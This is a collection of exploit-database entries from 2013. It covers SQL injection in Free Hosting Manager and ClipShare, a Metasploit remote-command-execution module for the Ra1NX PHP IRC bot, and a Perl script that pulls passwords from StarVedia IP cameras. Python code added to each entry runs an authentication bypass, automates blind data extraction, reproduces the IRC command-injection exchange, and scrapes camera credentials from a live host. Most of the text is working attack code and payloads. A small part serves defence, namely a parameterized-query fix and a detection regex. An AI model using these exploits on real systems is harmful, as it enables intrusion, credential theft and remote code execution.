Free Hosting Manager V2.0.2 Multiple SQLi

Exploit for the Free Hosting Manager V2.0.2 multiple SQL injection vulnerability

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi
# Author        : Saadat Ullah
# Author home   : http://security-geeks.blogspot.com
# Date          : 23/3/13
# Vendor        : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php

-------------------------------------------------------------------------
 --- [ Multiple SQL injection ] ---
The application is vulnerable to SQL injection in several files. Some of them are:

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
(inject into the cookie value clientuser)
http://localhost/free/clients/register.php  --->  SQLi in all POST fields.

Proof of Concept

In home.php
home.php calls a function auth(), which reads the three client cookies and uses them as-is:

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;

$dbquery = ("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ") 

The only processing applied is stripslashes(), which merely removes backslashes (for example those added by magic_quotes); it does not escape quotes and offers no protection against SQL injection.

# Independent Pakistani Security Researcher
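To make the cookie-based bug in auth() concrete, here is an added example (not Free Hosting Manager code) that rebuilds the home.php query on sqlite3 and runs the authentication bypass against it, side by side with a parameterized version. sqlite3 stands in for MySQL, and the clients table with its single row is constructed test data; the register.php INSERT shown above is the same string-concatenation pattern and has the same fix.

```python
# Added example (not Free Hosting Manager code): the auth() cookie query rebuilt
# on sqlite3 so the bypass and its fix can be run side by side. sqlite3 stands in
# for MySQL; the clients table and its one row are constructed test data.
import hashlib
import sqlite3

PASS_MD5 = hashlib.md5(b"s3cret").hexdigest()  # FHM stores md5($password)


def make_fhm_db():
    """Constructed clients table with the three columns auth() filters on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO clients VALUES (?, ?, ?)", (1, "alice", PASS_MD5))
    conn.commit()
    return conn


def auth_vulnerable(conn, clientid, clientuser, clientpass):
    """Same construction as auth() in home.php: the three cookie values are
    interpolated straight into the SQL string."""
    dbquery = (
        "SELECT * FROM clients WHERE id='%s' AND username='%s' AND password='%s'"
        % (clientid, clientuser, clientpass)
    )
    return conn.execute(dbquery).fetchone() is not None


def auth_fixed(conn, clientid, clientuser, clientpass):
    """Parameterized query: cookie data travels as bound values, so a quote in
    clientuser can never close the string literal or start a comment."""
    dbquery = "SELECT * FROM clients WHERE id=? AND username=? AND password=?"
    return conn.execute(dbquery, (clientid, clientuser, clientpass)).fetchone() is not None


# Cookie payload for clientuser: closes the literal, ORs in a tautology and
# comments out the rest of the WHERE clause, password check included.
# MySQL needs the space after "--" just like sqlite does.
BYPASS_USER = "' OR 1=1 -- "


def demo():
    """Legit login, bypass against the vulnerable query, bypass against the fix."""
    conn = make_fhm_db()
    return {
        "legit_login": auth_vulnerable(conn, "1", "alice", PASS_MD5),
        "bypass_on_vulnerable": auth_vulnerable(conn, "0", BYPASS_USER, "x"),
        "bypass_on_fixed": auth_fixed(conn, "0", BYPASS_USER, "x"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-22s %s" % (name, result))
```

The payload goes into the clientuser cookie exactly as the advisory says; clientid and clientpass can be anything, because everything after the injected comment marker is discarded by the database.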


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

Exploit for the ClipShare 4.1.1 (gmembers.php, gid param) blind SQL injection vulnerability

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
# All versions are vulnerable.
# Note: this vulnerability can only be exploited if at least one group has been added to the community.
# Last Checked: 24 March 2013

# To exploit this vulnerability, the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).

==============================================================================================

#Vulnerable Script:
PHP script: members.php, line 23 (the excerpt the author reproduces below is from gmembers.php)

=========================== BEGIN OF gmembers.php =============================================

<?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               :
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs     = $conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
    $urlkey     = $rs->fields['gurl'];
    $gname      = $rs->fields['gname'];
    $gupload    = $rs->fields['gupload'];
    $oid        = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................

?>

============================================================================================================


 
PoC:

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation:

http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  returns the normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  returns a page with some errors (or nothing at all, a white page)

A caveat for anyone reproducing this: the gmembers.php excerpt quoted above only accepts gid when is_numeric() passes, then runs it through mysql_real_escape_string() and wraps it in single quotes, so that line would reject "6 AND 1=1" as shown. The line the author actually points to is members.php line 23, which is not reproduced on this page.



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac
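The 1=1 / 1=2 probes above are only the oracle; what a tester does next is use that true/false signal to read data out. The following added example (not ClipShare code) does that against a simulated sink: sqlite3 stands in for MySQL, the group_own row is constructed data, and the sink interpolates gid unquoted and unvalidated, which is an assumption for the demo since the gmembers.php excerpt on this page validates and escapes the value. The MySQL spelling of the probe is ASCII(SUBSTRING(col, pos, 1)); sqlite uses unicode(substr()).

```python
# Added example (not ClipShare code): boolean-based blind extraction through an
# assumed unquoted numeric gid sink. sqlite3 stands in for MySQL; the group_own
# table and its row are constructed test data.
import sqlite3

SECRET_GNAME = "Cat Videos"  # constructed value that we will recover blind


def make_clipshare_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE group_own (GID INTEGER, gname TEXT, gurl TEXT, gupload INTEGER, OID INTEGER)"
    )
    conn.execute("INSERT INTO group_own VALUES (6, ?, 'cats', 1, 2)", (SECRET_GNAME,))
    conn.commit()
    return conn


def page_renders(conn, gid):
    """Oracle modelling gmembers.php: the group page renders only when the query
    affects exactly one row; otherwise the script redirects to error.php.
    ASSUMPTION: gid is interpolated unquoted (see lead-in)."""
    sql = "SELECT * FROM group_own WHERE GID=%s limit 1" % gid
    return len(conn.execute(sql).fetchall()) == 1


def blind_extract(oracle, gid, column, max_len=64):
    """Recover `column` of the row GID=gid one character at a time, binary
    searching each code point with about 7 true/false requests per character."""
    recovered = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "(SELECT unicode(substr(%s,%d,1)) FROM group_own WHERE GID=%d) > %d" % (
                column, pos, gid, mid)
            if oracle("%d AND %s" % (gid, cond)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end yields '' whose code point is NULL, so every
            # probe is false and the search bottoms out at 0: end of string.
            break
        recovered.append(chr(lo))
    return "".join(recovered)


def demo():
    """Returns the two PoC probe results and the blind-extracted gname."""
    conn = make_clipshare_db()
    oracle = lambda gid: page_renders(conn, gid)
    probes = {"6 AND 1=1": oracle("6 AND 1=1"), "6 AND 1=2": oracle("6 AND 1=2")}
    return probes, blind_extract(oracle, 6, "gname")


if __name__ == "__main__":
    probes, name = demo()
    print(probes)
    print("extracted gname: %r" % name)
```

Against a live target the oracle function would issue the HTTP request and compare the response with the known-good page (status code, length or a marker string), but the search loop is unchanged.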

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution vulnerability

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
                        'Description'    => %q{
                                        This module allows remote command execution on the PHP IRC bot Ra1NX by
                                        using the public call feature in private message to covertly bypass the
                                        authentication system.
                                },
                        'Author'         =>
                                [
                                        'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
                                ],
                        'License'        => MSF_LICENSE,
                        'References'     =>
                                [
                                        ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
                                        ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
                                        ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
                                ],
                        'Platform'       => [ 'unix', 'win'],
                        'Arch'           => ARCH_CMD,
                        'Payload'        =>
                                {
                                        'Space'    => 344,
                                        'BadChars' => '',
                                        'DisableNops' => true,
                                        'Compat'      =>
                                                {
                                                        'PayloadType' => 'cmd',
                                                }
                                },
                        'Targets'  =>
                                [
                                        [ 'Ra1NX', { } ]
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => 'March 24 2013',
                        'DefaultTarget'  => 0))

                register_options(
                        [
                                Opt::RPORT(6667),
                                OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
                                OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
                                OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
                                OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
                        ], self.class)
        end

        def check
                connect

                response = register(sock)
                if response =~ /463/ or response =~ /464/
                        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
                        return Exploit::CheckCode::Unknown
                end
                # Ask the bot, via its public-call syntax in a private message, to echo a
                # random token back to us; an echo means pubcall works without auth.
                confirm_string = rand_text_alpha(8)
                response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
                print response
                quit(sock)
                disconnect

                if response =~ /#{confirm_string}/
                        return Exploit::CheckCode::Vulnerable
                else
                        return Exploit::CheckCode::Safe
                end
        end

        def send_msg(sock, data)
                sock.put(data)
                data = ""
                begin
                        read_data = sock.get_once(-1, 1)
                        while not read_data.nil?
                                data << read_data
                                read_data = sock.get_once(-1, 1)
                        end
                rescue EOFError
                end
                data
        end

        def register(sock)
                msg = ""

                if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
                        msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
                end

                if datastore['NICK'].length > 9
                        nick = rand_text_alpha(9)
                        print_error("The nick is longer than 9 characters, using #{nick}")
                else
                        nick = datastore['NICK']
                end

                msg << "NICK #{nick}\r\n"
                msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

                response = send_msg(sock,msg)
                return response
        end

        def ra1nx_command(sock)
                # Public-call syntax "<bot> @<php function> <argument>", delivered by PRIVMSG
                # to the bot itself; the bot runs it without checking the sender.
                encoded = payload.encoded
                command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"
                response = send_msg(sock, command_msg)
                return response
        end

        def quit(sock)
                quit_msg = "QUIT :bye bye\r\n"
                sock.put(quit_msg)
        end

        def exploit
                connect

                print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
                response = register(sock)
                if response =~ /463/ or response =~ /464/
                        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
                        return
                end

                print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
                ra1nx_command(sock)

                quit(sock)
                disconnect
        end
end
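The module above is hard to read as a protocol exchange because the IRC framing is buried in Ruby string interpolation. The following is an added example, not the Metasploit module and not Ra1NX code: it builds the same PASS/NICK/USER and PRIVMSG lines as plain functions and pairs them with a simulated Ra1NX-style responder so the check() logic runs offline. The responder is an assumption modelled on what the module's check() expects, namely that a "<bot> @msg <nick> <text>" public call sent in a private message is honoured without authentication and <text> comes back; the USER hostname/servername fields are placeholders, and the PHP function names in the detection regex are assumed, since the module lets the operator choose any via PHP_EXEC.

```python
# Added example (not the Metasploit module above): the IRC exchange it drives,
# as message builders plus a simulated Ra1NX-style responder (an ASSUMPTION
# modelled on what the module's check() expects).
import random
import re
import string

CRLF = "\r\n"
PRIVMSG_RE = re.compile(r"^(?::(?P<prefix>\S+) )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$")


def rand_alpha(n):
    return "".join(random.choice(string.ascii_letters) for _ in range(n))


def register_lines(nick, password=""):
    """PASS/NICK/USER as the module's register() sends them. Nicks longer than
    9 chars are swapped for a random 9-char one (classic IRC nick limit).
    The USER hostname/servername fields are placeholders here (assumption)."""
    if len(nick) > 9:
        nick = rand_alpha(9)
    lines = ["PASS %s" % password] if password else []
    lines += ["NICK %s" % nick, "USER %s 0 * :%s" % (nick, nick)]
    return nick, CRLF.join(lines) + CRLF


def pubcall_line(rnick, func, arg):
    """Public-call syntax '<botnick> @<func> <arg>' wrapped in a PRIVMSG to the
    bot itself; func=system plus a shell command is what exploit() sends."""
    return "PRIVMSG %s :%s @%s %s%s" % (rnick, rnick, func, arg, CRLF)


def parse_privmsg(line):
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


class SimulatedRa1nx:
    """Models the flaw: the public-call parser runs on private messages and the
    sender is never checked against the authenticated master. Only @msg (the
    echo the module's check() relies on) is implemented; the rest is refused."""

    def __init__(self, nick):
        self.nick = nick

    def handle(self, sender, line):
        msg = parse_privmsg(line)
        if not msg or msg["target"] != self.nick:
            return ""
        parts = msg["text"].split(" ", 2)  # '<bot>', '@<cmd>', '<rest>'
        if len(parts) < 3 or parts[0] != self.nick or not parts[1].startswith("@"):
            return ""
        cmd, rest = parts[1][1:], parts[2]
        if cmd == "msg" and " " in rest:
            target, text = rest.split(" ", 1)
            return ":%s PRIVMSG %s :%s%s" % (self.nick, target, text, CRLF)
        return ""


def check_vulnerable(bot, attacker_nick):
    """Same logic as the module's check(): ask the bot to echo a random token
    back and treat the echo as proof that pubcall works unauthenticated."""
    confirm = rand_alpha(8)
    reply = bot.handle(attacker_nick, pubcall_line(bot.nick, "msg", "%s %s" % (attacker_nick, confirm)))
    return confirm in reply


# Detection angle for the IRC server or an IDS: a PRIVMSG whose text starts
# with the recipient's own nick followed by '@<word>' is the pubcall pattern.
# The function list is an assumption; the module accepts any name via PHP_EXEC.
PUBCALL_RE = re.compile(r"^PRIVMSG (?P<bot>\S+) :(?P=bot) @(?P<func>system|exec|passthru|shell_exec|msg)\b")


def looks_like_pubcall(line):
    return PUBCALL_RE.match(line) is not None


if __name__ == "__main__":
    nick, reg = register_lines("msf_user")
    print(reg, end="")
    print(pubcall_line("jhl1", "system", "id"), end="")
    print("vulnerable:", check_vulnerable(SimulatedRa1nx("jhl1"), nick))
```

The only thing an attacker needs is to be able to join the same IRC server and know the bot's nick; the bot's own password gate is never consulted because the public-call path runs before it.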

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

The Perl exploit for the StarVedia IPCamera IC502w IC502w v020313 username/password disclosure vulnerability is as follows.

#!/usr/bin/perl
#
#  [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life
#  and all my other friends for the help and support which
#  gives me. Kind regards to all of you, who read my lil'
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  ?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift;
$t = shift;
}
if ($type eq "-d") {
# passwd.cgi is served without authentication and comes back with the
# current username and password pre-filled in the form fields.
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulnerable, $!\n");
print " [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit\n";
print " [!] Exploiting: $t\n";
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
$result .= "   [o] User: $1\n";
}else{die(" Try another exploit, $!");}
if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
$result .= "   [o] Password: $1\n";
}else{die("Try another exploit or restart the exploit\n");}
sleep(1);
print " [m/] BINGO!!!\n\a".$result;
}
sub usg(){
print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
print " [!]  -d: disclosure password option\n";
print " [!] exp: perl $0 -d 127.0.0.1 :)\n";
exit;
}
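The exploit's two regexes are tied to one exact attribute order and size/maxlength values, so a firmware that reorders or requotes the attributes silently breaks them. The following added example (not the original exploit) does the same passwd.cgi scrape with a real HTML parser. SAMPLE_FORM is constructed test data shaped like the two INPUT tags the regexes match; the fetch helper uses urllib and is only called from main, so everything else runs offline.

```python
# Added example (not the Perl exploit above): parse the passwd.cgi form with an
# HTML parser instead of fixed regexes. SAMPLE_FORM is constructed test data.
from html.parser import HTMLParser
import urllib.request

SAMPLE_FORM = """<html><body><form action="/cgi-bin/passwd.cgi" method=post>
<INPUT type=text name=user size=20 maxlength=19 value="admin">
<INPUT type=password name=passwd size=20 maxlength=19 value="cam1234">
<input type=submit value="Apply">
</form></body></html>"""


class CredentialFormParser(HTMLParser):
    """Collects the value= attribute of the INPUT elements named user and passwd,
    whatever the attribute order, case or quoting style."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":  # HTMLParser lowercases tag names for us
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("name") in ("user", "passwd"):
            self.fields[a["name"]] = a.get("value", "")


def extract_credentials(html):
    """Return (user, passwd) when both pre-filled fields are present, else None."""
    p = CredentialFormParser()
    p.feed(html)
    if "user" in p.fields and "passwd" in p.fields:
        return p.fields["user"], p.fields["passwd"]
    return None


def fetch_passwd_form(host, timeout=10):
    """Unauthenticated GET of the page the exploit reads. If the camera (or a
    proxy in front of it) now demands credentials, urlopen raises HTTPError
    for the 401 and the caller knows the form is no longer exposed."""
    url = "http://%s/cgi-bin/passwd.cgi?" % host
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("latin-1", "replace")


if __name__ == "__main__":
    import sys
    html = fetch_passwd_form(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_FORM
    creds = extract_credentials(html)
    print("credentials disclosed: %r" % (creds,) if creds else "form not found")
```

Run without arguments it parses the constructed sample; with a host:port argument it performs the same unauthenticated request the Perl script does.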
